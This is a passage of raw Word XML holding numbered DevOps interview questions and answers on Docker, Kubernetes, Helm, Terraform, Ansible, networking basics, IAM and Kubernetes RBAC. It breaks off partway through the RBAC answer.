      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1653. What is a Dockerfile?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Dockerfile is a text file with a sequence of instructions (FROM, COPY, RUN, CMD, etc.) that Docker reads to build a container image layer by layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1654. How does a multi-stage Docker build work, and what problem does it fix?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1655. What is Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: What is</w:t>
        <w:br/>
        <w:t>Kubernetes</w:t>
        <w:br/>
        <w:t>?</w:t>
        <w:br/>
        <w:t>Kubernetes (often called K8s) is an open-source container orchestration platform used to deploy, manage, scale, and automate containerized applications.</w:t>
        <w:br/>
        <w:t>It was originally developed by Google and is now maintained by the Cloud Native Computing Foundation.</w:t>
        <w:br/>
        <w:t>Simple Definition</w:t>
        <w:br/>
        <w:t>If Docker helps you run containers, Kubernetes helps you manage thousands of containers across multiple servers automatically.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why Kubernetes is Used</w:t>
        <w:br/>
        <w:t>Kubernetes solves problems like:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Automatically deploying applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scaling applications up/down based on traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restarting failed containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Managing networking and storage</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling updates without downtime</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Self-healing infrastructure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core Idea</w:t>
        <w:br/>
        <w:t>A Kubernetes cluster consists of:</w:t>
        <w:br/>
        <w:t>Control Plane (Master)</w:t>
        <w:br/>
        <w:t>Manages the cluster and scheduling.</w:t>
        <w:br/>
        <w:t>Worker Nodes</w:t>
        <w:br/>
        <w:t>Machines where application containers run.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important Kubernetes Components</w:t>
        <w:br/>
        <w:t>Component</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Pod</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Smallest deployable unit</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Worker machine</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Deployment</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manages Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Service</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Exposes applications</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Namespace</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logical isolation</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ConfigMap</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores configuration</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Secret</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Stores sensitive data</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Ingress</w:t>
        <w:br/>
        <w:tab/>
        <w:t>HTTP/HTTPS routing</w:t>
        <w:br/>
        <w:tab/>
        <w:t>ReplicaSet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintains desired pod count</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example Workflow</w:t>
        <w:br/>
        <w:t xml:space="preserve">      1. Developer creates Docker container</w:t>
        <w:br/>
        <w:t xml:space="preserve">      2. Pushes image to registry</w:t>
        <w:br/>
        <w:t xml:space="preserve">      3. Kubernetes pulls image</w:t>
        <w:br/>
        <w:t xml:space="preserve">      4. Creates Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      5. Exposes app using Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">      6. Automatically scales and heals app</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key Features</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Container orchestration</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Auto-scaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Self-healing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Service discovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Rolling updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Infrastructure abstraction</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Multi-cloud support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-World Example</w:t>
        <w:br/>
        <w:t>Imagine running an e-commerce app with:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Frontend</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Backend APIs</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Database</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cache</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Payment service</w:t>
        <w:br/>
        <w:t>Kubernetes can:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Run all services independently</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Restart failed services automatically</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Scale backend during high traffic</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Update apps without downtime</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common Kubernetes Commands</w:t>
        <w:br/>
        <w:t>kubectl get pods</w:t>
        <w:br/>
        <w:t>kubectl get nodes</w:t>
        <w:br/>
        <w:t>kubectl apply -f deployment.yaml</w:t>
        <w:br/>
        <w:t>kubectl describe pod mypod</w:t>
        <w:br/>
        <w:t>kubectl logs mypod</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview One-Liner</w:t>
        <w:br/>
        <w:t>Kubernetes is an open-source container orchestration platform that automates deployment, scaling, networking, and management of containerized applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1656. What is a Pod in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Pod is the smallest deployable unit in Kubernetes - one or more tightly coupled containers that share the same network namespace, IP address, and storage volumes, and are always scheduled together on the same node.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1657. What is a Node in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Node is a single worker machine (physical or virtual) in a Kubernetes cluster that runs Pods, managed by the kubelet agent and container runtime, with cluster-wide scheduling handled by the control plane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1658. What is a Kubernetes namespace?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A namespace is a virtual partition within a Kubernetes cluster that scopes resource names and access controls, letting multiple teams or environments share one cluster without naming collisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1659. What is a Kubernetes Deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Deployment is a Kubernetes controller that manages a ReplicaSet of Pods, handling declarative rollouts, rolling updates, and rollbacks so you describe the desired state and Kubernetes reconciles the actual state to match.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1660. What is a Kubernetes Service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Service is a stable network endpoint (a fixed IP and DNS name) that load-balances traffic to a dynamic set of Pods matching a label selector, so clients don't need to track individual Pod IPs that change as Pods are created or destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1661. How do you upgrade/update a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1662. How does the GKE API server (control plane) expose traffic, and how do clients reach it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1663. What is etcd, and what happens to the cluster if etcd goes down?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1664. What does OOMKilled mean, and how do you fix it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1665. What happens when a Kubernetes node fails and goes NotReady?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1666. What happens to the Horizontal Pod Autoscaler (HPA) if the metrics server goes down during a traffic spike?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1667. What are taints and tolerations in Kubernetes, in one line?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1668. How is a Kubernetes cluster monitored - what tools and approach would you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1669. Kubernetes shows a Deployment as healthy and all Pods Running, but Grafana is alerting that the application isn't working properly - how do you investigate and fix this mismatch?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1670. What is a Helm chart?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A Helm chart is a packaged, templated collection of Kubernetes manifests (Deployments, Services, ConfigMaps, etc.) that can be parameterized with values and installed, upgraded, or rolled back as a single versioned release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1671. What is Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform is an infrastructure-as-code tool used to define and provision cloud and platform resources with declarative configuration. It manages resources through providers, state files, plans, and applies.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>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Q1672. What is a Terraform state file?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The state file is Terraform's record of the real-world resources it currently manages and their attributes, used to compute the diff between desired configuration and actual infrastructure on every plan/apply.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1673. What is Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Ansible is an agentless, push-based configuration management and automation tool that connects over SSH to apply YAML-defined playbooks, configuring servers or orchestrating multi-step deployments without installing any software on the target hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1674. How does Ansible help in DevOps and infrastructure automation, in practical terms?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1675. What is an Ansible playbook?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A playbook is a YAML file describing an ordered list of plays and tasks - each naming an Ansible module and its parameters - that define the desired state to apply to a group of hosts from the inventory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1676. What is a role in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A role is a standardized directory structure that packages related tasks, variables, templates, handlers, and files for one piece of functionality (like 'install nginx'), so it can be reused across multiple playbooks instead of duplicating the same tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1677. What is a task in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A task is the smallest unit of work in a playbook - a single call to an Ansible module with specific parameters, like installing a package or copying a file, executed in order against the targeted hosts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1678. What is an ad-hoc command in Ansible?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An ad-hoc command is a one-off Ansible module call run directly from the command line (e.g. `ansible all -m ping` or `ansible webservers -m service -a "name=nginx state=restarted"`) for quick, single-purpose actions that don't need a full playbook.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1679. What is the Ansible template module?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1680. What is idempotency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means repeating an operation has the same effect as performing it once. It is essential for safe retries, payment APIs, event processing, and deployment automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Idempotency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Q1681. How would you optimize a Google Cloud Run service that is taking a long time to start (cold starts)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1682. What is a load balancer?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A load balancer distributes incoming network traffic across multiple backend servers or instances, improving availability and throughput and removing any single instance as a point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1683. What is DNS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DNS translates human-readable domain names into IP addresses and other records. It is critical for service discovery, internet routing, email delivery, and application availability.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>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Q1684. What is a firewall?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A firewall is a network security control that inspects and filters incoming and outgoing traffic based on rules (source/destination IP, port, protocol), blocking traffic that doesn't match an allowed rule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1685. What is a subnet?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A subnet is a smaller, segmented range of IP addresses carved out of a VPC's larger address space, typically used to separate resources by tier (public-facing vs. private) or by availability zone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1686. In simple terms, how does network traffic flow from a client to a Pod in GKE (client to Load Balancer to Service to Pod)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1687. What is VPC Peering, and how does it differ from Cloud Interconnect and Partner Interconnect?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 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before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1688. What is IAM?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: IAM (Identity and Access Management) is the system that controls who (users, service accounts, applications) can do what (which actions) on which resources, typically through roles and policies that follow least-privilege principles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1689. What is RBAC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RBAC (Role-Based Access Control) in Kubernetes is a security mechanism that controls who can do what inside a cluster based on roles.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>RBAC answers: “Who is allowed to perform which actions on which resources?”</w:t>
        <w:br/>
        <w:t>It is used to enforce fine-grained access control in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why RBAC is needed</w:t>
        <w:br/>
        <w:t>In a cluster:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Many users and applications exist</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Not everyone should have full access</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Security must follow least privilege principle</w:t>
        <w:br/>
        <w:t>RBAC ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Only authorized users/pods can perform actions</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Sensitive resources are protected</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Main components of RBAC</w:t>
        <w:br/>
        <w:t>1. Role</w:t>
        <w:br/>
        <w:t>Defines permissions within a namespace</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can read pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Can list services</w:t>
        <w:br/>
        <w:t>kind: Role</w:t>
        <w:br/>
        <w:t>rules:</w:t>
        <w:br/>
        <w:t>- apiGroups: [""]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources: ["pods"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  verbs: ["get", "list"]</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. ClusterRole</w:t>
        <w:br/>
        <w:t>Same as Role, but cluster-wide scope</w:t>
        <w:br/>
        <w:t>Used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * PersistentVolumes</w:t>
        <w:br/>
        <w:t xml:space="preserve">      * Cluster-wide resources</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. RoleBinding</w:t>
        <w:br/>
        <w:t>Connects a Role → User/Group/ServiceAccount</w:t>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>kind: RoleBinding</w:t>
        <w:br/>
        <w:t>subjects:</w:t>
        <w:br/>
        <w:t>- kind: ServiceAccount</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: app-sa</w:t>
        <w:br/>
        <w:t>roleRef:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  kind: Role</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pod-reader</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. ClusterRoleBinding</w:t>
        <w:br/>
        <w:t>Binds a ClusterRole at cluster level</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How RBAC works (flow)</w:t>
        <w:br/>
